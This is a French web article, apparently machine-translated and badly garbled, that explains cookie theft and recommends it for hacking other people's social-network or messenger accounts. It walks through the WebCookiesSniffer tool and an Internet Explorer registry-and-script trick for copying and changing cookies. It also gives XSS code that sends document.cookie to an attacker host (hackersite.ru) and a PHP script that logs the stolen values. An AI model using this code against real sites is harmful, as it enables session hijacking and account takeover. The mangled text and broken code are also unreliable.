Sur Internet, il y avait beaucoup de hackers forumjd, sur lesquels les pirates informatiques communiquent les uns avec les autres. Les gens viennent là-bas dans l'espoir d'obtenir une aide gratuite. C'est là que vous pouvez trouver un grand nombre de programmes différents de piratage. Nous voulons vous avertir que vous ne devriez pas faire confiance à ces programmes. Utilitaires pour le vol à distance des cookies des pacificateurs de l'appareil de quelqu'un d'autre ou des programmes viraux. Si vous téléchargez ce logiciel sur votre PC, vous suivrez probablement un piège du fraudeur. Place libre Zhuliki Programmes. Ainsi, ils distribuent des logiciels viraux et reçoivent le contrôle sur les PC des autres. En général, ces programmes sont divorcés, vous comprendrez cela par leur interface et leur contenu. Si vous collectez comment utiliser n'importe quel logiciel pour les fichiers miniers, laissez-le être reniflant. Bien sûr, ils ne sont pas si faciles à utiliser. Oui, et trouvez un bon renifleur sur Internet n'est pas facile. Mais il y a un tel logiciel de spécialistes qui peuvent le vendre pour de l'argent. N'oubliez pas que les escrocs sont beaucoup, tout le monde a ses propres trucs. Essayant uniquement de prouver des pirates qui ont une bonne réputation, il y a des critiques et il y a notre propre site web.

En conclusion, je voudrais noter que le vol de Cook est une méthode très puissante, dont l'efficacité est très élevée. Si vous souhaitez pirater le profil de quelqu'un dans le réseau social ou messager, assurez-vous de considérer cette option. Le mieux de toutes cette méthode fonctionne lorsque vous pouvez utiliser l'ordinateur de sacrifice. Il est beaucoup plus difficile d'obtenir des matériaux à distance, mais vous pouvez utiliser nos conseils et essayer d'appliquer cette méthode dans la pratique.

Au chapitre

Avez-vous remarqué que revenir sur le site que vous aviez déjà visité que le site apprenne et s'ouvrirait avec les paramètres que vous avez appliqués pour la dernière fois? Oui, et assez souvent? Cela est dû à des cookies qui stockent des informations sur les visiteurs tels que la connexion, le mot de passe, l'identifiant de session et d'autres variables requises pour identifier le visiteur et afficher le contenu de la page en fonction des préférences de l'utilisateur sélectionnées par eux lorsque vous visitez la ressource. Webcookiessniffer affichera les fichiers utilisateur des cookies et leur contenu de sites visionnés par l'utilisateur dans le navigateur.

Voir les cookies

Vous ouvrez un site Web et Webcookiessniffer capture les cookies en temps réel. Toutes les cookies pris au piège L'utilitaire ajoute à la table dans laquelle les données hôtes sont stockées, le chemin de requête, la longueur totale du fichier de cookie, le nombre de variables dans le fichier de cookie et le cookie lui-même avec les noms des variables et des valeurs. Les informations collectées sur les cookies des fichiers Webcookiessniffer peuvent être enregistrées dans un fichier texte. En outre, le programme a la possibilité de former un rapport HTML sur tous ou par des cookies sélectionnés. Pour travailler le programme, vous devez installer le pilote WinPCAP (réside dans l'archive avec Webcookiessniffer). Pour que la langue du programme WebcookiSniffer soit devenue des Russes, copiez l'utilitaire Webcookiessniffer_lng.ini vers le répertoire (également investi dans l'archive).

Captures d'écran du programme WebcookiSnifer



Quel est le même cookie?

Il existe un mécanisme qui permet au serveur HTTP d'enregistrer certaines informations de texte sur l'ordinateur de l'utilisateur, puis contactez-la. Cette information s'appelle Cookie. En substance, chaque cookie est une paire: le nom du paramètre et sa valeur. En outre, chaque cookie est attribué à un domaine auquel il appartient. Pour des raisons de sécurité dans tous les navigateurs, le serveur HTTP est autorisé uniquement à contacter votre cookie de domaine. De plus, Cookie peut avoir une date de l'expiration, puis il sera stocké sur l'ordinateur à cette date, même si vous fermez toutes les fenêtres du navigateur.


Pourquoi le cookie est-il important?

Tous les cookies sont utilisés pour identifier l'utilisateur dans tous les cookies multijoueurs. Au contraire, la connexion utilisateur actuelle avec le service, Session d'utilisateur. Si quelqu'un découvre votre cookie, il sera capable de vous connecter en votre nom. Parce que pour le moment, très peu de ressources Internet vérifient la modification de l'adresse IP pour une session utilisateur.


Comment changer ou remplacer le cookie?

Les développeurs de navigateurs ne fournissent pas d'édition de cookies intégrés. Mais vous pouvez faire et le cahier habituel (Notepad).


Étape 1: Créez un fichier texte avec du texte

Windows Registry Editor version 5.00



@ \u003d "C: \\\\ ie_ext.htm"

Enregistrez-le sous le nom IE_ext.reg

Étape 2: Utilisation du fichier créé, ajoutez des modifications au registre Windows.

Étape 3: Créez un fichier texte avec du texte

< script langue \u003d "JavaScript"\u003e
externe.menuarguments.clipboarddata.setdata ("Texte", externe.menuarguments.document.cookie);

externe.menuarguments.document.cookie \u003d. "TestName \u003d TestValue; chemin \u003d /; domaine \u003d testdomain.ru";
alerte (externe.menuarguments.document.cookie);


Enregistrez-le sous le nom C: \\ ie_ext.htm

Étape 4: Allez sur le site Web d'intérêt pour nous.

Étape 5: Cliquez avec le bouton droit de la souris sur les clics sur une page gratuite et sélectionnez l'élément de menu. "Travailler avec des cookies". Laissez-moi accéder au tampon d'échange. Le presse-papiers obtiendra votre cookie ce site. Vous pouvez insérer leur ordinateur portable (Notepad) et voir.


Étape 6: Pour changer de cookie, modifiez le fichier C: \\ ie_ext.htm, remplaçant nom du test. Au nom de Cookie, testValue. - sur sa signification, testDomain.ru. - sur le domaine du site. Si nécessaire, ajoutez des lignes plus similaires. Pour une commodité de contrôle, j'ai ajouté à la sortie de script du cookie actuel avant et après le changement: alerte (externe.menuarguments.document.cookie);

Étape 7: Effectuez à nouveau l'étape 5, puis nous mettons à jour la page.

Résultat: Nous irons à cette ressource Internet avec des cookies mis à jour.

Comment voler des biscuits avec JavaScript?

Si l'attaquant a réussi à trouver la possibilité d'effectuer un script JavaScript arbitraire sur l'ordinateur de sacrifice, lisez le cookie actuel, il peut être très facile. Exemple:


var str \u003d document.cookie;

Mais s'il peut les transférer sur son site, car, comme je l'ai signalé plus tôt, le script JavaScript ne sera pas en mesure de contacter le site dans un autre domaine sans confirmation supplémentaire? Il s'avère que le script JavaScript peut télécharger une image sur n'importe quel serveur HTTP. Dans ce cas, transmettez toutes les informations de texte dans la demande de téléchargement pour cette image. Exemple: http://hackersite.ru/xss.jpg?text_info.Par conséquent, si vous exécutez ce code:

var img \u003d. nouvelle image ();

img.src \u003d. "http://hackersite.ru/xss.jpg?"+ Encodeuri (document.cookie);


Ensuite, Cookie sera dans la demande de téléchargement de "images" et de "partir" à un attaquant.

Comment traiter de telles demandes de télécharger des "images"?

Un attaquant n'a besoin que de trouver l'hébergement avec PHP Support et accueillir du code il y a similaire à celui-ci:

$ Uid \u003d urldecode ($ _ serveur ["Query_string"]);
$ FP \u003d fopen ("log.txt", "a");
Fput ($ fp, "$ uid \\ n");
Fcfrose ($ PF);
?>

Ensuite, tous les paramètres de requête pour ce script seront stockés dans le fichier. log.txt. Il reste seulement dans le script JavaScript décrit précédemment. http://hackersite.ru/xss.jpg. Sur le chemin de ce script php.


Résultat

Je n'ai montré que le moyen le plus simple d'utiliser des vulnérabilités XSS. Mais cela prouve que la présence d'au moins une de ces vulnérabilités sur un site Web multijoueur peut permettre à un attaquant d'utiliser ses ressources de votre part.

Avez-vous aimé l'article? Partager avec des amis: